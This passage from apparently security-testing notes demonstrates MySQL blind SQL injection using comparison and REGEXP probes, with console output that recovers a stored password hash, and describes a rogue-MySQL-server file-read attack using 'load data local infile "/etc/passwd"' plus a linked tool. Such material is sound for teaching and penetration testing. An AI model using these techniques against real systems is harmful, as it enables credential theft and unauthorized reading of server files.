mysql> select password from users limit 1,1;
+----------------------------------+
| password                         |
+----------------------------------+
| e99a18c428cb38d5f260853678922e03 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,first_name from users where user_id=1 and (select (select 'e99a1')) > (select password from users limit 1,1);
Empty set (0.00 sec)
mysql> select user_id,first_name from users where user_id=1 and (select (select 'e99a19')) > (select password from users limit 1,1);
+---------+------------+
| user_id | first_name |
+---------+------------+
|       1 | admin      |
+---------+------------+
1 row in set (0.00 sec)



11

REGEXP blind injection
mysql> select password from users limit 1,1;
+----------------------------------+
| password                         |
+----------------------------------+
| e99a18c428cb38d5f260853678922e03 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select (select password from users limit 1,1) regexp '^e';
+----------------------------------------------------+
| (select password from users limit 1,1) regexp '^e' |
+----------------------------------------------------+
|                                                  1 |
+----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '^e9';
+-----------------------------------------------------+
| (select password from users limit 1,1) regexp '^e9' |
+-----------------------------------------------------+
|                                                   1 |
+-----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '^e98';
+------------------------------------------------------+
| (select password from users limit 1,1) regexp '^e98' |
+------------------------------------------------------+
|                                                    0 |
+------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '3$';
+----------------------------------------------------+
| (select password from users limit 1,1) regexp '3$' |
+----------------------------------------------------+
|                                                  1 |
+----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '03$';
+-----------------------------------------------------+
| (select password from users limit 1,1) regexp '03$' |
+-----------------------------------------------------+
|                                                   1 |
+-----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp 'f03$';
+------------------------------------------------------+
| (select password from users limit 1,1) regexp 'f03$' |
+------------------------------------------------------+
|                                                    0 |
+------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 and (select password from users limit 1,1) regexp '^e';
+---------+----------------------------------+
| user_id | password                         |
+---------+----------------------------------+
|       1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 and (select password from users limit 1,1) regexp '^e8';
Empty set (0.00 sec)



12

MySQL arbitrary file read

An attacker sets up a rogue MySQL server; when a client connects to this rogue server, the attacker can read arbitrary files from the victim. This relies on the LOAD DATA INFILE syntax, which reads a file's contents into a table.


load data local infile "/etc/passwd" into table TestTable


1. Combine it with a website's reinstallation vulnerability to read arbitrary files from the server.

2. Features that connect to an external database, such as data migration.

3. Deploy it on a honeypot to collect information about attackers.

Tool (python2): https://github.com/allyshka/Rogue-MySql-Server

